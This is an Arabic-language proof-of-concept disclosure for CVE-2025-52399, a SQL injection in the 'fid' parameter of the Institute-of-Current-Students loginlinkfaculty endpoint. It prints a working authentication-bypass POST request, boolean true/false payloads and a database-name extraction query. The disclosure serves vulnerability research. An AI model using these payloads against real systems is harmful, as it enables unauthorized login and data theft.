
استغلال إثبات المفهوم لـ CVE-2025-52399، يُظهر حقن SQL في تطبيق Institute-of-Current-Students عبر نقطة النهاية loginlinkfaculty لتجاوز المصادقة واستخراج البيانات.
نقطة النهاية loginlinkfaculty في تطبيق Institute-of-Current-Students معرضة لحقن SQL عبر المعامل fid في طلب POST. لا يتم تطهير المعامل بشكل صحيح قبل استخدامه في استعلام SQL، مما يسمح للمهاجمين عن بُعد بتنفيذ أوامر SQL عشوائية.
/loginlinkfaculty (POST)fidicsnewPOST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → صحيح
❌ -1' OR 2*3=4 AND 000942=000942 -- → خاطئ
SELECT database(); -- يرجع 'icsnew'
Isroil Mustafoqulov